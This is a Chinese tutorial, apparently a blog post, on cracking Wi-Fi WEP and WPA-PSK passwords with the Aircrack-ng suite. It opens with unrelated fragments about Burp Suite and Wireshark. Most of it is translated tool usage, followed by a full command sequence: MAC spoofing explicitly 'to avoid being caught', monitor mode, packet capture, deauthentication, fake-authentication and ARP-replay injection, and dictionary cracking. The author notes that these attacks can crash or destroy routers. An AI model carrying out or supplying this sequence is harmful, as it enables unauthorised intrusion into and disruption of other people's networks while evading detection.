使用Burp Suite进行渗透测试时,渗透测试人员可以通过拦截和修改请求,探测和利用Web应用程序的安全漏洞。
4. WiresharkWireshark是一款流行的网络分析工具,用于捕获和分析网络上的数据包。
它能够显示网络上的实时数据流量,并提供了强大的过滤和分析功能。
Wireshark可用于监视网络流量、发现敏感信息泄露和检测网络攻击。
使用Wireshark进行渗透测试时,渗透测试人员可以捕获目标系统上的网络流量,并分析其中的漏洞和安全问题。
本文主要是针对无线网络的密码破解,使用平台linux 2.26.21.5 ,实现环境BACKTRACK 3 FINAL(USB),无线破解工具Aircrack-ng ,官方网站http://www.aircrack-ng .org ,Aircrack-ng系列工具也有windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能弃win 从lin 了,另外win 下扫描到的AP 也比lin 下少了很多。
其实WIN 并不完整的支持TCP/IP 协议族,有些协议win 直接丢弃不用。
网络本来从一开始就是unix 的天下,win 只是在后来加入了网络的功能。
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:airmon-ng 处理网卡工作模式airodump-ng 抓包aircrack-ng 破解aireplay-ng 发包,干扰另外还要用到以下linux 命令:ifconfig 查看修改网卡状态和参数macchanger 伪造MACiwconfig 主要针对无线网卡的工具(同ifconfig)iwlist 获取无线网络的更详细信息另外还有其他的linux 基本命令,我就不提示了。
具体破解步骤:1. 修改无线网卡状态:先down 掉2. 伪造无线网卡的MAC 地址:安全起见,减少被抓到的可能3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡4. 修改无线网卡状态:up5. 查看网络状态,记录下AP 的MAC 和本机的MAC ,确定攻击目标6. 监听抓包:生成.cap 或.ivs7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包8. 破解.cap 或.ivs ,获得WEP 密码,完成破解下面详细介绍一下各个命令的基本用法(参照命令的英文说明)1. ifconfig用来配置网卡,我们这里主要用来禁用和启用网卡:ifconfig ath0 downifconfig ath0 up禁用一下网卡的目的是为了下一步修改MAC 。
2.macchanger用来改变网卡的MAC 地址,具体用法如下:usage: macchanger [options] device-h 显示帮助-V 显示版本-s 显示当前MAC-e 不改变mac,使用硬件厂商写入的MAC-a 自动生成一个同类型的MAC,同厂商的-A 自动生成一个不同类型的MAC,不同厂商的-r 生成任意MAC-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。
3.airmon-ng启动无线网卡进入Monitor 模式,useage: airmon-ng <start|stop|check> <interface> [channel]<start|stop|check> 启动,停止,检测<interface> 指定无线网卡[channel] 监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了4.iwconfig专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options][essid{NN|ON|OFF}] 指定essid号开启关闭[nwid{NN|on|off}] 指定网络id号开启关闭[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型[freq N.NNNN[K|M|G]] 指定工作频率[channel N] 指定频道[ap {N|off|auto}] 指定AP号关闭/自动[sens N] sens 号[nick N] nick 号[rate {N|auto|fixed}] 速率控制[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了[frag {N|auto|fixed|off}] 碎片控制[enc {NNNN-NNNN|off}] 范围[power {period N|timeout N}] 电源频率/超时[retry {limit N|lifetime N}] 重试限次/超时[txpower N{mw|dBm}] 功率毫瓦/分贝[commit] 处理5.iwlist主要用来显示无线网卡的一些附加信息,同上useage: iwlist [interface] optionsscanning 扫描frequency 频率channel 频道bitrate 速率rate 速率encryption 加密key 密钥power 电源txpower 功率ap apaccespoints appeers 直连event 事件6.airodump-ng抓包工具,我最喜欢用的,详细用法如下:usage: airodump-ng <options> <interface>[,<interface>,...]Options:--ivs :仅将抓取信息保存为.ivs--gpsd :使用GPSd--write <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分-w :同--write--beacons :保存所有的beacons ,默认情况况下是丢弃那些无用的数据包的--update <secs> :显示更新延迟,没有用过--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了-h :隐藏已知的,配合上面的选项使用-f <msecs> :跳频时间--berlin <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻译的都会有出入,这是我的理解.(mhy_mhy注)-r <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵Filter options:--encrypt <suite> : 使用密码序列过滤AP--netmask <netmask> : 使用掩码过滤AP--bssid <bssid> : 使用bssid 过滤AP-a : 过滤无关的客户端默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:--channel <channels>:指定频道--band <abg> :制定带宽-C <frequencies> :指定频率MHz--cswitch <method> : 设置频道交换方式0 : FIFO (default) 先进先出(默认)1 : Round Robin 循环2 : Hop on last 最后一跳-s : 同上--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文7.aireplay-ng搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.usage: aireplay-ng <options> <replay interface>Filter options:-b bssid : AP的MAC-d dmac : 目标的MAC-s smac : 来源的MAC-m len : 最小包长度-n len : 最大包长度-u type : 帧控制, type field-v subt : 帧控制, subtype field-t tods : 帧控制, To DS bit-f fromds : 帧控制, From DS bit-w iswep : 帧控制, WEP bit-D : 禁用AP 发现功能Replay options:-x nbpps : 每秒包数量-p fctrl : 框架设定(hex)-a bssid : 设置AP的mac-c dmac : 设置目标的MAC-h smac : 设置来源的mac-g value : 改变环缓存大小(默认8)-F : 选择第一个匹配的包Fakeauth attack options:-e essid : 设置目标AP 的SSID-o npckts : 每秒爆破的包数量(0 自动, 默认1)-q sec : 存活时间秒-y prga : 共享可信的key流Arp Replay attack options:-j : 注入fromDS 数据包,还没有用过这个选项Fragmentation attack options:-k IP : 设置目的IP 碎片-l IP : 设置源IP碎片Test attack options:-B : 激活bitrate 测试source options:-i iface : 设置抓包的接口设备-r file : 从pcap文件析取数据包attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方--deauth count : 不信任一切(-0)--fakeauth delay : 欺骗AP的信任(-1)--interactive : 交互的选择(-2)--arpreplay : 标准的ARP-request replay (-3)--chopchop : 解密WEP 包(-4)--fragment : 生成有效的key流(-5)--caffe-latte : 从客户端获取新的IVs (-6)--cfrag : 对客户端进行碎片攻击(-7)--test : 测试注射及效果(-9)--help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.8.aircrack-ng破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.usage: aircrack-ng [options] <.cap / .ivs file(s)>Common options:-a <amode> : 暴破(1/WEP, 2/WPA-PSK)-e <essid> : 选择essid 为目标-b <bssid> : 选择ap的mac 为目标,就是破解识别的关键字-q : 使用安静模式,无数出模式-C <macs> : 将所有的AP 合并为一个虚拟的Static WEP cracking options:-c : 仅搜索字母数字-t : 仅搜索二进制-h : 搜索数字关键字(用于坏掉的部分),翻译不出来了-d <mask> : 指定掩码(A1:XX:CF:YY)-m <maddr> : 用MAC 匹配可用的数据包-n <nbits> : WEP 长度64/128/152/256/512-i <index> : WEP 索引(1 to 4), default: any-f <fudge> : 暴破强度默认2,原文字面意思是"禽兽强迫捏造事实",呵呵-k <korek> : 禁用一种破解方式(1 to 17)-x or -x0 : 禁用最新关键字暴破-x1 : 使用最新关键字暴破默认-x2 : 用最新两个字节暴破-y : 实验单线程模式-K : KoreK 攻击(pre-PTW)-s : 显示为ASCII-M <num> : 最大数量ivs 使用-D : WEP 非隐蔽模式-P <num> : PTW debug: 1 disable Klein, 2 PTW-1 : 尝试一次PTWWEP and WPA-PSK cracking options:-w <words> : 指定目录文件,可以多个-r <DB> : 制定airolib-ng 数据库,不能和-w 一起使用--help : 显示这个帮助说明:好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.下面以我的硬件实例来操作一下:我的硬件是atheros 的a/b/g 无线网卡,在linux 中显示为ath0 ,我只列出我常用的命令步骤,不再做任何解释:ifconfig ath0 downmacchanger -r ath0macchanger -r wifi0ifconfig ath1 upairmon-ng start ath1 6iwconfig ath1iwlist ath1 scanningairodump-ng -w *.cap -c 6 ath1aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1aircrack-ng -x -f 2 *.capaircrack-ng -w passdict.txt *.capaircrack-ng -n 64 -b apmac *.ivsaircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap。